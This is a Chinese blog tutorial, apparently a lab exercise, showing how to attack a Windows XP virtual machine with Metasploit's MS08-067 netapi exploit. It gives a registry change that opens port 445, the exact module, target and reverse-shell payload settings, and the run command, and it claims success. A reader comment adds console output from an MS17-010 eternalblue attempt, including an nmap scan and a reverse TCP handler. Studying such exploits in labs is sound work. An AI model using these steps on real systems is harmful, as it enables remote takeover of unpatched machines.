Metasploit攻击xp,windows/smb/ms08_067_netapi

第一步 安装XP虚拟机

这里用的系统版本如下

然后用nmap扫描XP系统的ip地址发现,扫不出来445端口,也就不用metasploit进行攻击

所以先对XP设置一下

编辑注册表HKEY_LOCAL_MACHINE=>SYSTEM=>CurrentControlSet=>Services=>NetBT=>Parameters

在Parameters上右键新建DWORD值,数值为1,重命名为SMBDeviceEnabled

然后重启设备,再用nmap去扫描就可以发现,可以扫到445端口了

第二步 使用metasploit对XP发起攻击

1 开启metasploit

2 选择攻击模块 exploit/windows/smb/ms08_067_netapi

3 查看参数 show options

4 设置目标主机 set rhosts 172.16.5.9

5 设置target: set target 34

6 设置payload:set payload windows/shell_reverse_tcp

7 查看设置完成的参数

8 执行攻击 exploit

到此,攻击成功!

 

 

 

msf6 exploit(windows/smb/ms17_010_eternalblue) > nmap -O 192.168.200.129 [*] exec: nmap -O 192.168.200.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:32 EDT Nmap scan report for 192.168.200.129 Host is up (0.00026s latency). Not shown: 992 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1433/tcp open ms-sql-s MAC Address: 00:0C:29:1B:D6:5A (VMware) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445 rport => 445 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.200.208:4444 [*] 192.168.200.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.200.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit) [*] 192.168.200.129:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.200.129:445 - The target is vulnerable. [-] 192.168.200.129:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets [*] Exploit completed, but no session was created.
最新发布
03-22
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Test9912

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值